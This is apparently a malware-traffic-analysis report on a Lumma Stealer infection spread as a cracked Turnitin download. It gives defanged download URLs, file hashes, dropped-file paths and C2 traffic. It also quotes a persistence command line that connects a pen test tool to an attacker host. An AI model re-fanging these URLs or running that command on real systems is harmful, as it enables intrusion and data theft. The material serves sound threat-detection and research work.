Malware-Traffic-Analysis.net - 2025-06-26: Lumma Stealer infection with follow-up malware

2025-06-26 (THURSDAY): LUMMA STEALER INFECTION WITH FOLLOW-UP MALWARE

NOTICE:

Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

ASSOCIATED FILES:

NOTES

This is one of the Lumma Stealer examples distributed as cracked versions of popular software.

DATE/TIME OF INFECTION:

PATH TO INITIAL DOWNLOAD:

hxxps[:]//www.facebook[.]com/media/set/?set=a.6907433412682773
hxxps[:]//gohhs[.]com/2wQzon
hxxps[:]//media.cloud839v3[.]cyou/Turnitin+Free+Download+Crack+Windows.zip
hxxps[:]//arch.kot3jsd[.]my/bridge/u/Y27r2P1ouMf2u5AztNgPxot5/Turnitin%20Free%20Download%20Crack%20Windows.zip

ASSOCIATED FILES:

SHA256 hash: 5743fac858ce41d0f507d82517358c69652459283c133a3cdb70231792caa066
File size: 940,799,051 bytes
File name: turnitin free download crack windows.exe
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
File description: Installer EXE for Lumma Stealer malware extracted from the above 7-zip archive
Note: This file is inflated with over 900 MB of null bytes (0x00)

SHA256 hash: 362029dd294baf0331303930883a2cd65dad83f76479c9951e3739b4b86e4246
File size: 36,928,617 bytes
File description: Above installer EXE with most of the null byte padding removed

SHA256 hash: 393d54e26b1b9e3c3c591d850580f4e86c478800f49d108023fca3a253b4ae47
File size: 25,512 bytes
File location: C:\Users\[username]\AppData\Local\Temp\Argentina.wmv
File location: C:\Users\[username]\AppData\Local\Temp\Argentina.wmv.bat
File type: ASCII text, with very long lines (1171), with CRLF line terminators
File description: Obfuscated batch (.bat) file that creates AutoIt3.exe and .a3x script for Lumma Stealer and runs the malware

SHA256 hash: 0d43a430203ef9e97cca133222163b8639a1d2e22aecfd1b435bf2625b4e278f
File size: 465,111 bytes
File location: not found saved to disk (had to create from .cab file content)
File type: data
File description: Binary for Lumma Stealer run as .a3x file by copy of AutoIt3.exe

SHA256 hash: 40e6b15c9a73bab855029ce417b3cbe758bd4dac03f3fff2dc4fa9f3cbe8b29b
File size: 5,943,296 bytes
File location: hxxp[:]//86.54.25[.]40/sok.exe
File location: C:\Users\[username]\AppData\Local\Temp\Y9WF3LTVMPJIZV68AL8T53SRM2.exe
File type: PE32+ executable (GUI) x86-64, for MS Windows
File description: 64-bit EXE, loader dropped during Lumma Stealer infection

SHA256 hash: cdfa264eeb65a8b3ea2e49b248c7cb689899d3f9da2483d293365fdf1912313e
File size: 13,532,672 bytes
File location: hxxps[:]//github[.]com/ramzan4ik-leaks/BOENG/raw/refs/heads/main/m4.exe
File location: C:\Users\[username]\AppData\Local\Microsoft\Windows\m4.exe
File type: PE32+ executable (console) x86-64, for MS Windows
File description: Pen test tool retrieved by the above loader and configured as malware

WINDOWS SHORTCUT FOR PERSISTENCE OF MALICIOUSLY CONFIGURED PEN TEST TOOL:

C:\Users\[username]\AppData\Local\Microsoft\Windows\m4.exe -connect hxxps[:]//metallurgify[.]com:16443 -tls -pass 1488 -ws

LUMMA STEALER C2 TRAFFIC:

TRAFFIC GENERATED BY FOLLOW-UP LOADER AND PEN TEST TOOL:

hxxps[:]//github[.]com/ramzan4ik-leaks/BOENG/raw/refs/heads/main/m4.exe
hxxps[:]//raw.githubusercontent[.]com/ramzan4ik-leaks/BOENG/refs/heads/main/m4.exe
api.telegram[.]org - HTTPS traffic
144.172.112[.]32:16443 - metallurgify[.]com - TLSv1.3 traffic

Shown above: Facebook page with link to malware disguised as a cracked version of Turnitin.

Shown above: Extracting the malicious Windows executable (.exe) file from the downloaded, password-protected 7-Zip archive.

Shown above: Traffic from an infection filtered in Wireshark.

Shown above: Files dropped from the infection.

Shown above: Pen test tool configured as malware made persistent through a Windows shortcut (.lnk file) in the Start Menu's Startup directory.

Click here to return to the main page.